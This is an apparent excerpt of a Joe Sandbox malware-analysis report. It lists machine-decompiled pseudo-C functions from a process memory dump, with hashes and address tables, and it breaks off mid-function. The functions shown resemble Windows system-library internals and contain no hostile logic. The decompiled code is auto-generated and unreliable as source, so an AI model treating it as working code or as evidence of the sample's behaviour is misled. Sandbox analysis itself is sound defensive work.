                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee3a7e5955e2603f062ed36392773fcc258b289bff255e073b9760930870cc98
                                                                                                            • Instruction ID: bf51fe27cb22ec992adc0978944406a745ed4bd93e8c0edd3aee7549612c9cf4
                                                                                                            • Opcode Fuzzy Hash: ee3a7e5955e2603f062ed36392773fcc258b289bff255e073b9760930870cc98
                                                                                                            • Instruction Fuzzy Hash: 7C016271A04209EFCB14DFA8D542AAEB7F4EF18704F5041A9A954DB382D635D901CB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0112131B Relevance: .0, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 48%
                                                                                                            			E0112131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x115d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01087D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                            0x0112131b
                                                                                                            0x0112132a
                                                                                                            0x01121330
                                                                                                            0x01121336
                                                                                                            0x0112133e
                                                                                                            0x01121341
                                                                                                            0x01121344
                                                                                                            0x0112134f
                                                                                                            0x01121361
                                                                                                            0x01121351
                                                                                                            0x0112135a
                                                                                                            0x0112135a
                                                                                                            0x0112136c
                                                                                                            0x0112136d
                                                                                                            0x0112136f
                                                                                                            0x01121374
                                                                                                            0x01121387

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 238b22d47dad998a05ce389d9af65def0a2a645a281f2c5f99447c5854bfd2ff
                                                                                                            • Instruction ID: 194ffff74c00afc1112fc21c1f823bc7ef482e6780b34024cdd1b1b027090ec6
                                                                                                            • Opcode Fuzzy Hash: 238b22d47dad998a05ce389d9af65def0a2a645a281f2c5f99447c5854bfd2ff
                                                                                                            • Instruction Fuzzy Hash: 9E018C71A04258AFCB04EFE8D505AAEB7F4FF18300F40406AF845EB381E6349A00CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01138F6A Relevance: .0, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 48%
                                                                                                            			E01138F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x115d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01087D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                            0x01138f6a
                                                                                                            0x01138f79
                                                                                                            0x01138f81
                                                                                                            0x01138f84
                                                                                                            0x01138f8b
                                                                                                            0x01138f91
                                                                                                            0x01138f94
                                                                                                            0x01138f9e
                                                                                                            0x01138fb0
                                                                                                            0x01138fa0
                                                                                                            0x01138fa9
                                                                                                            0x01138fa9
                                                                                                            0x01138fbb
                                                                                                            0x01138fbc
                                                                                                            0x01138fbe
                                                                                                            0x01138fc3
                                                                                                            0x01138fd6

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d27a20967185795165c84036f4cd9730a5164653fa9b4edb2adb5ab79d5b42d
                                                                                                            • Instruction ID: 0df51291f3f622622206fc44d8ce0d7358e5aa6df5b496352adfc07d5f8c62d5
                                                                                                            • Opcode Fuzzy Hash: 5d27a20967185795165c84036f4cd9730a5164653fa9b4edb2adb5ab79d5b42d
                                                                                                            • Instruction Fuzzy Hash: 17014F74A0420DEFDB04EFA8D545AAEB7F4EF58300F50406AB955EB381EB34DA00CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01121608 Relevance: .0, Instructions: 34COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E01121608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x115d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01087D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                                            0x01121608
                                                                                                            0x01121617
                                                                                                            0x0112161d
                                                                                                            0x01121625
                                                                                                            0x01121628
                                                                                                            0x0112162b
                                                                                                            0x01121636
                                                                                                            0x01121648
                                                                                                            0x01121638
                                                                                                            0x01121641
                                                                                                            0x01121641
                                                                                                            0x01121653
                                                                                                            0x01121654
                                                                                                            0x01121656
                                                                                                            0x0112165b
                                                                                                            0x0112166e

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d9ff13b655d448074aaa2573b35e96837c4f06682fe362ab912a57a0acbf5b9c
                                                                                                            • Instruction ID: d49ffea095adbb1476a785e5117b76c1672610340d4cb53e662281eaa5b10f06
                                                                                                            • Opcode Fuzzy Hash: d9ff13b655d448074aaa2573b35e96837c4f06682fe362ab912a57a0acbf5b9c
                                                                                                            • Instruction Fuzzy Hash: CDF06271A04258EFDB14EFE8D505AAEB7F4EF18300F444069E955EB381E6749900CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108C577 Relevance: .0, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0108C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0108C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x10411cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E011388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                            0x0108c577
                                                                                                            0x0108c57d
                                                                                                            0x0108c581
                                                                                                            0x0108c5b5
                                                                                                            0x0108c5b9
                                                                                                            0x0108c5ce
                                                                                                            0x0108c5ce
                                                                                                            0x0108c5ca
                                                                                                            0x00000000
                                                                                                            0x0108c5ca
                                                                                                            0x0108c5c4
                                                                                                            0x0108c5c8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108c5ad
                                                                                                            0x00000000
                                                                                                            0x0108c5af

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3f20def78394b0a7761ee3f9944f05e53cf9040b91aebb43e4cbc94dd7ff3c92
                                                                                                            • Instruction ID: 053ffd9a922e33e1bf55b0b15e98aff5f26b49a3fa7b3e67277a8d36e311d24f
                                                                                                            • Opcode Fuzzy Hash: 3f20def78394b0a7761ee3f9944f05e53cf9040b91aebb43e4cbc94dd7ff3c92
                                                                                                            • Instruction Fuzzy Hash: E4F06DB29196909AFF66A7188244BA17FF49B05670F4484A6E5C687512C7A4DCC0C270
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01122073 Relevance: .0, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E01122073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0111FD22(__ecx);
				_t19 =  *0x115849c - _t3; // 0xf6f1653
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1158748; // 0x0
					if(__eflags <= 0) {
						E01121C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1158724 & 0x00000004;
							if(( *0x1158724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1158724; // 0x0
					return E01118DF1(__ebx, 0xc0000374, 0x1155890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                            0x01122076
                                                                                                            0x01122078
                                                                                                            0x0112207d
                                                                                                            0x01122083
                                                                                                            0x011220a4
                                                                                                            0x011220aa
                                                                                                            0x011220ac
                                                                                                            0x011220b7
                                                                                                            0x011220ba
                                                                                                            0x011220bc
                                                                                                            0x011220c9
                                                                                                            0x011220c9
                                                                                                            0x011220d0
                                                                                                            0x011220d2
                                                                                                            0x00000000
                                                                                                            0x011220d2
                                                                                                            0x011220be
                                                                                                            0x011220c3
                                                                                                            0x011220c5
                                                                                                            0x011220c7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x011220c7
                                                                                                            0x011220bc
                                                                                                            0x011220d4
                                                                                                            0x01122085
                                                                                                            0x01122085
                                                                                                            0x011220a3
                                                                                                            0x011220a3

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1da1eda6c1e4a05423090f9bc00c4a4faac375bd02f17eecf2336281523118b
                                                                                                            • Instruction ID: cbfe72b0a861b68ba28c0cf663e0f67046fa329dfff585c38d8118fddc10db56
                                                                                                            • Opcode Fuzzy Hash: e1da1eda6c1e4a05423090f9bc00c4a4faac375bd02f17eecf2336281523118b
                                                                                                            • Instruction Fuzzy Hash: CFF0A02A8156A58ADF3EAB2E61013ED6F92D756114B4904A5D9A01B209C73888E3CB68
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A927A Relevance: .0, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E010A927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E010AFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E010A92C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                                            0x010a9295
                                                                                                            0x010a9299
                                                                                                            0x010a929f
                                                                                                            0x010a92aa
                                                                                                            0x010a92ad
                                                                                                            0x010a92ae
                                                                                                            0x010a92af
                                                                                                            0x010a92b0
                                                                                                            0x010a92b4
                                                                                                            0x010a92bb
                                                                                                            0x010a92bb
                                                                                                            0x010a92c5

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                            • Instruction ID: d2d35f15ea84b437be74bad45d252715d9fd673a9aef274f9f8ed718e3f5872b
                                                                                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                            • Instruction Fuzzy Hash: 8FE02B323405016BE7119E49CC80F87379DDF92724F044078B5005E242C6E5DC0887A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01138D34 Relevance: .0, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 43%
                                                                                                            			E01138D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x115d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01087D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                            0x01138d34
                                                                                                            0x01138d43
                                                                                                            0x01138d4b
                                                                                                            0x01138d4e
                                                                                                            0x01138d52
                                                                                                            0x01138d5c
                                                                                                            0x01138d6e
                                                                                                            0x01138d5e
                                                                                                            0x01138d67
                                                                                                            0x01138d67
                                                                                                            0x01138d79
                                                                                                            0x01138d7a
                                                                                                            0x01138d7c
                                                                                                            0x01138d81
                                                                                                            0x01138d94

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d08f242ab5503b0b9e06e81535d3641a10ca6c176b96d5e3919366cb3fa366da
                                                                                                            • Instruction ID: 7397d246a0ea1618662a6525c5c57d81cbd6b596ce970fe372e7e50e79c2d68f
                                                                                                            • Opcode Fuzzy Hash: d08f242ab5503b0b9e06e81535d3641a10ca6c176b96d5e3919366cb3fa366da
                                                                                                            • Instruction Fuzzy Hash: F3F0B470A047089FDB18EFB8D545AAE77B4EF58300F508099F955EB281DA34D900C754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01138B58 Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 36%
                                                                                                            			E01138B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x115d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01087D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                            0x01138b67
                                                                                                            0x01138b6f
                                                                                                            0x01138b72
                                                                                                            0x01138b7d
                                                                                                            0x01138b8f
                                                                                                            0x01138b7f
                                                                                                            0x01138b88
                                                                                                            0x01138b88
                                                                                                            0x01138b9a
                                                                                                            0x01138b9b
                                                                                                            0x01138b9d
                                                                                                            0x01138ba2
                                                                                                            0x01138bb5

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 268990216e6460816329757df8eaeff25536396a73a3200724b10751a73a7ce3
                                                                                                            • Instruction ID: 21028815cdea20b742c013adde15bd172dcec76ae648430c68acd1b0fd3b7e40
                                                                                                            • Opcode Fuzzy Hash: 268990216e6460816329757df8eaeff25536396a73a3200724b10751a73a7ce3
                                                                                                            • Instruction Fuzzy Hash: 3DF0E2B0A04259AFDB08EBA8D906EAE77B4EF04300F400099BA01DB384EB34D900C794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108746D Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E0108746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0107EB70(__ecx, 0x11579a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E010A95D0();
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                                            0x0108746d
                                                                                                            0x0108746d
                                                                                                            0x0108746d
                                                                                                            0x01087471
                                                                                                            0x01087488
                                                                                                            0x010cf92d
                                                                                                            0x0108748e
                                                                                                            0x01087491
                                                                                                            0x01087495
                                                                                                            0x010cf937
                                                                                                            0x010cf93a
                                                                                                            0x010cf94e
                                                                                                            0x010cf953
                                                                                                            0x010cf956
                                                                                                            0x010cf956
                                                                                                            0x01087495
                                                                                                            0x00000000
                                                                                                            0x01087488
                                                                                                            0x01087473
                                                                                                            0x01087478
                                                                                                            0x0108747d
                                                                                                            0x01087481
                                                                                                            0x00000000
                                                                                                            0x01087481
                                                                                                            0x0108747d
                                                                                                            0x0108747a
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4c59dadad4169852b1c0e890a1972c6ddd1250faf95e0f10c45213bb9a8cc00
                                                                                                            • Instruction ID: 12e9aa86250b51318a81b31a938eebe0d56d6d92bd4372939b72c94c723ecd16
                                                                                                            • Opcode Fuzzy Hash: b4c59dadad4169852b1c0e890a1972c6ddd1250faf95e0f10c45213bb9a8cc00
                                                                                                            • Instruction Fuzzy Hash: 86F05930908149EACF4AB77CC840BBD7FF1AF00294F245199D8E1A7069EF648800CB86
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01138CD6 Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 36%
                                                                                                            			E01138CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x115d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01087D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                            0x01138ce5
                                                                                                            0x01138ced
                                                                                                            0x01138cf0
                                                                                                            0x01138cfb
                                                                                                            0x01138d0d
                                                                                                            0x01138cfd
                                                                                                            0x01138d06
                                                                                                            0x01138d06
                                                                                                            0x01138d18
                                                                                                            0x01138d19
                                                                                                            0x01138d1b
                                                                                                            0x01138d20
                                                                                                            0x01138d33

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d4233bfea432c69befaddd46f6c02587decb8bdd3a5709f46bcf2e6eeedaaf99
                                                                                                            • Instruction ID: b2eddc3482408abba154220d4700e3b2c7b3e14e9a17ac413787725cd38cb397
                                                                                                            • Opcode Fuzzy Hash: d4233bfea432c69befaddd46f6c02587decb8bdd3a5709f46bcf2e6eeedaaf99
                                                                                                            • Instruction Fuzzy Hash: 78F08270A04209ABDB08EBF8E945EAE77B4EF58200F500199F955EB285EA34D900C754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01064F2E Relevance: .0, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01064F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E011388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0108C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1041030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                                            0x01064f2e
                                                                                                            0x01064f34
                                                                                                            0x01064f38
                                                                                                            0x010c0b85
                                                                                                            0x010c0b85
                                                                                                            0x010c0b89
                                                                                                            0x010c0b9a
                                                                                                            0x010c0b9a
                                                                                                            0x010c0b9f
                                                                                                            0x00000000
                                                                                                            0x010c0b9f
                                                                                                            0x010c0b94
                                                                                                            0x010c0b98
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c0b98
                                                                                                            0x01064f3e
                                                                                                            0x01064f48
                                                                                                            0x00000000
                                                                                                            0x01064f6e
                                                                                                            0x00000000
                                                                                                            0x01064f70

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55f0776113b6622b2b3da9b10dafc0030e129a5304ca506f666ff9171c30be20
                                                                                                            • Instruction ID: c7441a7790afcf0b0a61594628c673fb0738da9f8f42bb83b79af6b528152746
                                                                                                            • Opcode Fuzzy Hash: 55f0776113b6622b2b3da9b10dafc0030e129a5304ca506f666ff9171c30be20
                                                                                                            • Instruction Fuzzy Hash: 48F0E939516694CFD7B1DB1CC244B1A77E8AB00B7CF0485F8F58587555C734EC84CA50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109A44B Relevance: .0, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0109A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1157b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E010AFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                                            0x0109a44b
                                                                                                            0x0109a453
                                                                                                            0x0109a472
                                                                                                            0x0109a476
                                                                                                            0x00000000
                                                                                                            0x0109a493
                                                                                                            0x0109a47a
                                                                                                            0x0109a47f
                                                                                                            0x0109a486
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 443cde448be8b4f0d66db654adac1dded066c4400f04cd30ac6c5a790e39c573
                                                                                                            • Instruction ID: d30e4e2526ea3b96d700c04f680f59f4113f0311a48b273fb2f42a8bf313a1ce
                                                                                                            • Opcode Fuzzy Hash: 443cde448be8b4f0d66db654adac1dded066c4400f04cd30ac6c5a790e39c573
                                                                                                            • Instruction Fuzzy Hash: 99E09272B01422EBD3215A58AC00FAB739DDBE4A51F0A4035E684C7254DA68DD11C7E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106F358 Relevance: .0, Instructions: 28COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E0106F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0109F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
